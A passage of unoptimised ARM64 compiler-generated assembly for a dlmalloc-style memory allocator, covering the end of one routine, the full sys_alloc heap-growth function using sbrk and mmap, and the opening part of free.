ldr x8, [sp, #136]
ldr x9, [sp, #64]
str x8, [x9, #24]
ldr x9, [sp, #88]
str x8, [x9, #16]
ldr x8, [sp, #64]
ldr x9, [sp, #136]
str x8, [x9, #16]
ldr x8, [sp, #88]
ldr x9, [sp, #136]
str x8, [x9, #24]
ldr x8, [sp, #136]
; kill: def $x9 killed $xzr
str xzr, [x8, #48]
b LBB2_122
LBB2_120:
bl _abort
LBB2_121: ; in Loop: Header=BB2_109 Depth=1
b LBB2_109
LBB2_122:
b LBB2_123
LBB2_123:
b LBB2_124
LBB2_124:
b LBB2_125
LBB2_125:
ldur x8, [x29, #-48]
add x8, x8, #16
stur x8, [x29, #-24]
b LBB2_129
LBB2_126:
b LBB2_127
LBB2_127:
bl _abort
LBB2_128:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB2_129
LBB2_129:
ldur x0, [x29, #-24]
ldp x29, x30, [sp, #400] ; 16-byte Folded Reload
ldp x28, x27, [sp, #384] ; 16-byte Folded Reload
add sp, sp, #416
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function sys_alloc
_sys_alloc: ; @sys_alloc
.cfi_startproc
; %bb.0:
sub sp, sp, #272
.cfi_def_cfa_offset 272
stp x28, x27, [sp, #240] ; 16-byte Folded Spill
stp x29, x30, [sp, #256] ; 16-byte Folded Spill
add x29, sp, #256
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, _mparams@PAGE
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
str x9, [sp, #24] ; 8-byte Folded Spill
stur x0, [x29, #-32]
stur x1, [x29, #-40]
mov x9, #-1
stur x9, [x29, #-48]
stur xzr, [x29, #-56]
stur wzr, [x29, #-60]
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
bl _init_mparams
b LBB3_2
LBB3_2:
ldur x8, [x29, #-32]
ldr w8, [x8, #880]
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB3_8
b LBB3_3
LBB3_3:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB3_8
b LBB3_4
LBB3_4:
ldur x8, [x29, #-32]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_8
b LBB3_5
LBB3_5:
ldur x0, [x29, #-32]
ldur x1, [x29, #-40]
bl _mmap_alloc
stur x0, [x29, #-80]
ldur x8, [x29, #-80]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_7
b LBB3_6
LBB3_6:
ldur x8, [x29, #-80]
stur x8, [x29, #-24]
b LBB3_106
LBB3_7:
b LBB3_8
LBB3_8:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
add x8, x8, #96
ldr x10, [x9, #16]
subs x10, x10, #1
add x8, x8, x10
ldr x9, [x9, #16]
subs x9, x9, #1
bic x8, x8, x9
stur x8, [x29, #-72]
ldur x8, [x29, #-72]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, hi
tbnz w8, #0, LBB3_10
b LBB3_9
LBB3_9:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB3_106
LBB3_10:
ldur x8, [x29, #-32]
ldr x8, [x8, #872]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_15
b LBB3_11
LBB3_11:
ldur x8, [x29, #-32]
ldr x8, [x8, #856]
ldur x9, [x29, #-72]
add x8, x8, x9
stur x8, [x29, #-88]
ldur x8, [x29, #-88]
ldur x9, [x29, #-32]
ldr x9, [x9, #856]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB3_13
b LBB3_12
LBB3_12:
ldur x8, [x29, #-88]
ldur x9, [x29, #-32]
ldr x9, [x9, #872]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB3_14
b LBB3_13
LBB3_13:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB3_106
LBB3_14:
b LBB3_15
LBB3_15:
ldur x8, [x29, #-32]
ldr w8, [x8, #880]
ands w8, w8, #0x4
cset w8, ne
tbnz w8, #0, LBB3_52
b LBB3_16
LBB3_16:
mov x8, #-1
stur x8, [x29, #-96]
ldur x8, [x29, #-72]
stur x8, [x29, #-104]
ldur x8, [x29, #-32]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_18
b LBB3_17
LBB3_17:
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB3_19
LBB3_18:
ldur x0, [x29, #-32]
ldur x8, [x29, #-32]
ldr x1, [x8, #40]
bl _segment_holding
str x0, [sp, #16] ; 8-byte Folded Spill
b LBB3_19
LBB3_19:
ldr x8, [sp, #16] ; 8-byte Folded Reload
stur x8, [x29, #-112]
ldur x8, [x29, #-112]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_32
b LBB3_20
LBB3_20:
mov w0, #0
bl _sbrk
stur x0, [x29, #-120]
ldur x8, [x29, #-120]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_31
b LBB3_21
LBB3_21:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-120]
ldr x9, [x9, #8]
subs x9, x9, #1
ands x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB3_23
b LBB3_22
LBB3_22:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-120]
ldr x10, [x9, #8]
subs x10, x10, #1
add x8, x8, x10
ldr x9, [x9, #8]
subs x9, x9, #1
bic x8, x8, x9
ldur x9, [x29, #-120]
subs x9, x8, x9
ldur x8, [x29, #-104]
add x8, x8, x9
stur x8, [x29, #-104]
b LBB3_23
LBB3_23:
ldur x8, [x29, #-32]
ldr x8, [x8, #856]
ldur x9, [x29, #-104]
add x8, x8, x9
str x8, [sp, #128]
ldur x8, [x29, #-104]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB3_30
b LBB3_24
LBB3_24:
ldur x8, [x29, #-104]
mov x9, #9223372036854775807
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_30
b LBB3_25
LBB3_25:
ldur x8, [x29, #-32]
ldr x8, [x8, #872]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_28
b LBB3_26
LBB3_26:
ldr x8, [sp, #128]
ldur x9, [x29, #-32]
ldr x9, [x9, #856]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB3_30
b LBB3_27
LBB3_27:
ldr x8, [sp, #128]
ldur x9, [x29, #-32]
ldr x9, [x9, #872]
subs x8, x8, x9
cset w8, hi
tbnz w8, #0, LBB3_30
b LBB3_28
LBB3_28:
ldur x8, [x29, #-104]
mov x0, x8
bl _sbrk
stur x0, [x29, #-96]
ldur x8, [x29, #-120]
subs x8, x0, x8
cset w8, ne
tbnz w8, #0, LBB3_30
b LBB3_29
LBB3_29:
ldur x8, [x29, #-120]
stur x8, [x29, #-48]
ldur x8, [x29, #-104]
stur x8, [x29, #-56]
b LBB3_30
LBB3_30:
b LBB3_31
LBB3_31:
b LBB3_36
LBB3_32:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
ldur x10, [x29, #-32]
ldr x10, [x10, #16]
subs x8, x8, x10
add x8, x8, #96
ldr x10, [x9, #16]
subs x10, x10, #1
add x8, x8, x10
ldr x9, [x9, #16]
subs x9, x9, #1
bic x8, x8, x9
stur x8, [x29, #-104]
ldur x8, [x29, #-104]
mov x9, #9223372036854775807
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_35
b LBB3_33
LBB3_33:
ldur x8, [x29, #-104]
mov x0, x8
bl _sbrk
stur x0, [x29, #-96]
ldur x8, [x29, #-112]
ldr x8, [x8]
ldur x9, [x29, #-112]
ldr x9, [x9, #8]
add x8, x8, x9
subs x8, x0, x8
cset w8, ne
tbnz w8, #0, LBB3_35
b LBB3_34
LBB3_34:
ldur x8, [x29, #-96]
stur x8, [x29, #-48]
ldur x8, [x29, #-104]
stur x8, [x29, #-56]
b LBB3_35
LBB3_35:
b LBB3_36
LBB3_36:
ldur x8, [x29, #-48]
adds x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB3_51
b LBB3_37
LBB3_37:
ldur x8, [x29, #-96]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_47
b LBB3_38
LBB3_38:
ldur x8, [x29, #-104]
mov x9, #9223372036854775807
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_46
b LBB3_39
LBB3_39:
ldur x8, [x29, #-104]
ldur x9, [x29, #-40]
add x9, x9, #96
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_46
b LBB3_40
LBB3_40:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
add x8, x8, #96
ldur x10, [x29, #-104]
subs x8, x8, x10
ldr x10, [x9, #16]
subs x10, x10, #1
add x8, x8, x10
ldr x9, [x9, #16]
subs x9, x9, #1
bic x8, x8, x9
str x8, [sp, #120]
ldr x8, [sp, #120]
mov x9, #9223372036854775807
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_45
b LBB3_41
LBB3_41:
ldr x8, [sp, #120]
mov x0, x8
bl _sbrk
str x0, [sp, #112]
ldr x8, [sp, #112]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_43
b LBB3_42
LBB3_42:
ldr x9, [sp, #120]
ldur x8, [x29, #-104]
add x8, x8, x9
stur x8, [x29, #-104]
b LBB3_44
LBB3_43:
ldur x9, [x29, #-104]
mov x8, #0
subs x8, x8, x9
mov x0, x8
bl _sbrk
mov x8, #-1
stur x8, [x29, #-96]
b LBB3_44
LBB3_44:
b LBB3_45
LBB3_45:
b LBB3_46
LBB3_46:
b LBB3_47
LBB3_47:
ldur x8, [x29, #-96]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_49
b LBB3_48
LBB3_48:
ldur x8, [x29, #-96]
stur x8, [x29, #-48]
ldur x8, [x29, #-104]
stur x8, [x29, #-56]
b LBB3_50
LBB3_49:
ldur x9, [x29, #-32]
ldr w8, [x9, #880]
orr w8, w8, #0x4
str w8, [x9, #880]
b LBB3_50
LBB3_50:
b LBB3_51
LBB3_51:
b LBB3_52
LBB3_52:
ldur x8, [x29, #-48]
adds x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB3_56
b LBB3_53
LBB3_53:
ldur x1, [x29, #-72]
mov x0, #0
mov w2, #3
mov w3, #4098
mov w4, #-1
mov x5, #0
bl _mmap
str x0, [sp, #104]
ldr x8, [sp, #104]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_55
b LBB3_54
LBB3_54:
ldr x8, [sp, #104]
stur x8, [x29, #-48]
ldur x8, [x29, #-72]
stur x8, [x29, #-56]
mov w8, #1
stur w8, [x29, #-60]
b LBB3_55
LBB3_55:
b LBB3_56
LBB3_56:
ldur x8, [x29, #-48]
adds x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB3_66
b LBB3_57
LBB3_57:
ldur x8, [x29, #-72]
mov x9, #9223372036854775807
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_65
b LBB3_58
LBB3_58:
mov x8, #-1
mov x9, x8
str x9, [sp, #96]
str x8, [sp, #88]
ldur x8, [x29, #-72]
mov x0, x8
bl _sbrk
str x0, [sp, #96]
mov w0, #0
bl _sbrk
str x0, [sp, #88]
ldr x8, [sp, #96]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_64
b LBB3_59
LBB3_59:
ldr x8, [sp, #88]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_64
b LBB3_60
LBB3_60:
ldr x8, [sp, #96]
ldr x9, [sp, #88]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_64
b LBB3_61
LBB3_61:
ldr x8, [sp, #88]
ldr x9, [sp, #96]
subs x8, x8, x9
str x8, [sp, #80]
ldr x8, [sp, #80]
ldur x9, [x29, #-40]
add x9, x9, #80
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB3_63
b LBB3_62
LBB3_62:
ldr x8, [sp, #96]
stur x8, [x29, #-48]
ldr x8, [sp, #80]
stur x8, [x29, #-56]
b LBB3_63
LBB3_63:
b LBB3_64
LBB3_64:
b LBB3_65
LBB3_65:
b LBB3_66
LBB3_66:
ldur x8, [x29, #-48]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB3_105
b LBB3_67
LBB3_67:
ldur x10, [x29, #-56]
ldur x9, [x29, #-32]
ldr x8, [x9, #856]
add x8, x8, x10
str x8, [x9, #856]
ldur x9, [x29, #-32]
ldr x9, [x9, #864]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB3_69
b LBB3_68
LBB3_68:
ldur x8, [x29, #-32]
ldr x8, [x8, #856]
ldur x9, [x29, #-32]
str x8, [x9, #864]
b LBB3_69
LBB3_69:
ldur x8, [x29, #-32]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_77
b LBB3_70
LBB3_70:
ldur x8, [x29, #-32]
ldr x8, [x8, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_72
b LBB3_71
LBB3_71:
ldur x8, [x29, #-48]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_73
b LBB3_72
LBB3_72:
ldur x8, [x29, #-48]
ldur x9, [x29, #-32]
str x8, [x9, #24]
b LBB3_73
LBB3_73:
ldur x8, [x29, #-48]
ldur x9, [x29, #-32]
str x8, [x9, #888]
ldur x8, [x29, #-56]
ldur x9, [x29, #-32]
str x8, [x9, #896]
ldur w8, [x29, #-60]
ldur x9, [x29, #-32]
str w8, [x9, #912]
adrp x8, _mparams@PAGE
ldr x8, [x8, _mparams@PAGEOFF]
ldur x9, [x29, #-32]
str x8, [x9, #64]
ldur x9, [x29, #-32]
mov x8, #4095
str x8, [x9, #56]
ldur x0, [x29, #-32]
bl _init_bins
ldur x8, [x29, #-32]
adrp x9, __gm_@PAGE
add x9, x9, __gm_@PAGEOFF
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB3_75
b LBB3_74
LBB3_74:
ldur x0, [x29, #-32]
ldur x1, [x29, #-48]
ldur x8, [x29, #-56]
subs x2, x8, #80
bl _init_top
b LBB3_76
LBB3_75:
ldur x8, [x29, #-32]
subs x8, x8, #16
ldur x9, [x29, #-32]
ldur x9, [x9, #-8]
and x9, x9, #0xfffffffffffffff8
add x8, x8, x9
str x8, [sp, #72]
ldur x0, [x29, #-32]
ldr x1, [sp, #72]
ldur x8, [x29, #-48]
ldur x9, [x29, #-56]
add x8, x8, x9
ldr x9, [sp, #72]
subs x8, x8, x9
subs x2, x8, #80
bl _init_top
b LBB3_76
LBB3_76:
b LBB3_102
LBB3_77:
ldur x8, [x29, #-32]
add x8, x8, #888
str x8, [sp, #64]
b LBB3_78
LBB3_78: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #64]
subs x8, x8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_80
b LBB3_79
LBB3_79: ; in Loop: Header=BB3_78 Depth=1
ldur x8, [x29, #-48]
ldr x9, [sp, #64]
ldr x9, [x9]
ldr x10, [sp, #64]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB3_80
LBB3_80: ; in Loop: Header=BB3_78 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
tbz w8, #0, LBB3_82
b LBB3_81
LBB3_81: ; in Loop: Header=BB3_78 Depth=1
ldr x8, [sp, #64]
ldr x8, [x8, #16]
str x8, [sp, #64]
b LBB3_78
LBB3_82:
ldr x8, [sp, #64]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_88
b LBB3_83
LBB3_83:
ldr x8, [sp, #64]
ldr w8, [x8, #24]
ands w8, w8, #0x8
cset w8, ne
tbnz w8, #0, LBB3_88
b LBB3_84
LBB3_84:
ldr x8, [sp, #64]
ldr w8, [x8, #24]
; kill: def $x8 killed $w8
and x8, x8, #0x1
ldur w9, [x29, #-60]
; kill: def $x9 killed $w9
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB3_88
b LBB3_85
LBB3_85:
ldur x8, [x29, #-32]
ldr x8, [x8, #40]
ldr x9, [sp, #64]
ldr x9, [x9]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB3_88
b LBB3_86
LBB3_86:
ldur x8, [x29, #-32]
ldr x8, [x8, #40]
ldr x9, [sp, #64]
ldr x9, [x9]
ldr x10, [sp, #64]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_88
b LBB3_87
LBB3_87:
ldur x10, [x29, #-56]
ldr x9, [sp, #64]
ldr x8, [x9, #8]
add x8, x8, x10
str x8, [x9, #8]
ldur x0, [x29, #-32]
ldur x8, [x29, #-32]
ldr x1, [x8, #40]
ldur x8, [x29, #-32]
ldr x8, [x8, #16]
ldur x9, [x29, #-56]
add x2, x8, x9
bl _init_top
b LBB3_101
LBB3_88:
ldur x8, [x29, #-48]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_90
b LBB3_89
LBB3_89:
ldur x8, [x29, #-48]
ldur x9, [x29, #-32]
str x8, [x9, #24]
b LBB3_90
LBB3_90:
ldur x8, [x29, #-32]
add x8, x8, #888
str x8, [sp, #64]
b LBB3_91
LBB3_91: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #64]
subs x8, x8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_93
b LBB3_92
LBB3_92: ; in Loop: Header=BB3_91 Depth=1
ldr x8, [sp, #64]
ldr x8, [x8]
ldur x9, [x29, #-48]
ldur x10, [x29, #-56]
add x9, x9, x10
subs x8, x8, x9
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB3_93
LBB3_93: ; in Loop: Header=BB3_91 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB3_95
b LBB3_94
LBB3_94: ; in Loop: Header=BB3_91 Depth=1
ldr x8, [sp, #64]
ldr x8, [x8, #16]
str x8, [sp, #64]
b LBB3_91
LBB3_95:
ldr x8, [sp, #64]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_99
b LBB3_96
LBB3_96:
ldr x8, [sp, #64]
ldr w8, [x8, #24]
ands w8, w8, #0x8
cset w8, ne
tbnz w8, #0, LBB3_99
b LBB3_97
LBB3_97:
ldr x8, [sp, #64]
ldr w8, [x8, #24]
; kill: def $x8 killed $w8
and x8, x8, #0x1
ldur w9, [x29, #-60]
; kill: def $x9 killed $w9
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB3_99
b LBB3_98
LBB3_98:
ldr x8, [sp, #64]
ldr x8, [x8]
str x8, [sp, #56]
ldur x8, [x29, #-48]
ldr x9, [sp, #64]
str x8, [x9]
ldur x10, [x29, #-56]
ldr x9, [sp, #64]
ldr x8, [x9, #8]
add x8, x8, x10
str x8, [x9, #8]
ldur x0, [x29, #-32]
ldur x1, [x29, #-48]
ldr x2, [sp, #56]
ldur x3, [x29, #-40]
bl _prepend_alloc
stur x0, [x29, #-24]
b LBB3_106
LBB3_99:
ldur x0, [x29, #-32]
ldur x1, [x29, #-48]
ldur x2, [x29, #-56]
ldur w3, [x29, #-60]
bl _add_segment
b LBB3_100
LBB3_100:
b LBB3_101
LBB3_101:
b LBB3_102
LBB3_102:
ldur x8, [x29, #-40]
ldur x9, [x29, #-32]
ldr x9, [x9, #16]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB3_104
b LBB3_103
LBB3_103:
ldur x10, [x29, #-40]
ldur x9, [x29, #-32]
ldr x8, [x9, #16]
subs x8, x8, x10
str x8, [x9, #16]
str x8, [sp, #48]
ldur x8, [x29, #-32]
ldr x8, [x8, #40]
str x8, [sp, #40]
ldr x8, [sp, #40]
ldur x9, [x29, #-40]
add x8, x8, x9
ldur x9, [x29, #-32]
str x8, [x9, #40]
str x8, [sp, #32]
ldr x8, [sp, #48]
orr x8, x8, #0x1
ldr x9, [sp, #32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #40]
str x8, [x9, #8]
ldr x8, [sp, #40]
add x8, x8, #16
stur x8, [x29, #-24]
b LBB3_106
LBB3_104:
b LBB3_105
LBB3_105:
bl ___error
mov w8, #12
str w8, [x0]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB3_106
LBB3_106:
ldur x0, [x29, #-24]
ldp x29, x30, [sp, #256] ; 16-byte Folded Reload
ldp x28, x27, [sp, #240] ; 16-byte Folded Reload
add sp, sp, #272
ret
.cfi_endproc
; -- End function
.globl _free ; -- Begin function free
.p2align 2
_free: ; @free
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #480
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
str x8, [sp, #88] ; 8-byte Folded Spill
add x9, x8, #600
str x9, [sp, #96] ; 8-byte Folded Spill
add x8, x8, #72
str x8, [sp, #104] ; 8-byte Folded Spill
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_215
b LBB4_1
LBB4_1:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-24]
subs x8, x8, #16
stur x8, [x29, #-32]
ldur x8, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #84] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_3
b LBB4_2
LBB4_2:
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, ne
str w8, [sp, #84] ; 4-byte Folded Spill
b LBB4_3
LBB4_3:
ldr w8, [sp, #84] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_212
b LBB4_4
LBB4_4:
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-40]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-48]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
ands x8, x8, #0x1
cset w8, ne
tbnz w8, #0, LBB4_87
b LBB4_5
LBB4_5:
ldur x8, [x29, #-32]
ldr x8, [x8]
stur x8, [x29, #-56]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
ands x8, x8, #0x3
cset w8, ne
tbnz w8, #0, LBB4_9
b LBB4_6
LBB4_6:
ldur x8, [x29, #-56]
add x9, x8, #32
ldur x8, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-40]
ldur x8, [x29, #-32]
ldur x9, [x29, #-56]
subs x0, x8, x9
ldur x1, [x29, #-40]
bl _munmap
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB4_8
b LBB4_7
LBB4_7:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x10, [x29, #-40]
ldr x8, [x9, #856]
subs x8, x8, x10
str x8, [x9, #856]
b LBB4_8
LBB4_8:
b LBB4_214
LBB4_9:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-32]
ldur x10, [x29, #-56]
subs x8, x8, x10
stur x8, [x29, #-64]
ldur x10, [x29, #-56]
ldur x8, [x29, #-40]
add x8, x8, x10
stur x8, [x29, #-40]
ldur x8, [x29, #-64]
stur x8, [x29, #-32]
ldur x8, [x29, #-64]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_84
b LBB4_10
LBB4_10:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-32]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_80
b LBB4_11
LBB4_11:
ldur x8, [x29, #-56]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB4_30
b LBB4_12
LBB4_12:
ldr x9, [sp, #104] ; 8-byte Folded Reload
ldur x8, [x29, #-32]
ldr x8, [x8, #16]
stur x8, [x29, #-72]
ldur x8, [x29, #-32]
ldr x8, [x8, #24]
stur x8, [x29, #-80]
ldur x8, [x29, #-56]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-84]
ldur x8, [x29, #-72]
ldur w10, [x29, #-84]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #80] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_16
b LBB4_13
LBB4_13:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-72]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #76] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_15
b LBB4_14
LBB4_14:
ldur x8, [x29, #-72]
ldr x8, [x8, #24]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #76] ; 4-byte Folded Spill
b LBB4_15
LBB4_15:
ldr w8, [sp, #76] ; 4-byte Folded Reload
str w8, [sp, #80] ; 4-byte Folded Spill
b LBB4_16
LBB4_16:
ldr w8, [sp, #80] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_28
b LBB4_17
LBB4_17:
ldur x8, [x29, #-80]
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_19
b LBB4_18
LBB4_18:
ldur w9, [x29, #-84]
mov w8, #1
lsl w10, w8, w9
adrp x9, __gm_@PAGE
ldr w8, [x9, __gm_@PAGEOFF]
bic w8, w8, w10
str w8, [x9, __gm_@PAGEOFF]
b LBB4_27
LBB4_19:
ldr x9, [sp, #104] ; 8-byte Folded Reload
ldur x8, [x29, #-80]
ldur w10, [x29, #-84]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_23
b LBB4_20
LBB4_20:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-80]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #68] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_22
b LBB4_21
LBB4_21:
ldur x8, [x29, #-80]
ldr x8, [x8, #16]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #68] ; 4-byte Folded Spill
b LBB4_22
LBB4_22:
ldr w8, [sp, #68] ; 4-byte Folded Reload
str w8, [sp, #72] ; 4-byte Folded Spill
b LBB4_23
LBB4_23:
ldr w8, [sp, #72] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_25
b LBB4_24
LBB4_24:
ldur x8, [x29, #-80]
ldur x9, [x29, #-72]
str x8, [x9, #24]
ldur x8, [x29, #-72]
ldur x9, [x29, #-80]
str x8, [x9, #16]
b LBB4_26
LBB4_25:
bl _abort
LBB4_26:
b LBB4_27
LBB4_27:
b LBB4_29
LBB4_28:
bl _abort
LBB4_29:
b LBB4_79
LBB4_30:
ldur x8, [x29, #-32]
stur x8, [x29, #-96]
ldur x8, [x29, #-96]
ldr x8, [x8, #48]
stur x8, [x29, #-104]
ldur x8, [x29, #-96]
ldr x8, [x8, #24]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_38
b LBB4_31
LBB4_31:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-96]
ldr x8, [x8, #16]
stur x8, [x29, #-120]
ldur x8, [x29, #-96]
ldr x8, [x8, #24]
stur x8, [x29, #-112]
ldur x8, [x29, #-120]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #64] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_34
b LBB4_32
LBB4_32:
ldur x8, [x29, #-120]
ldr x8, [x8, #24]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #64] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_34
b LBB4_33
LBB4_33:
ldur x8, [x29, #-112]
ldr x8, [x8, #16]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, eq
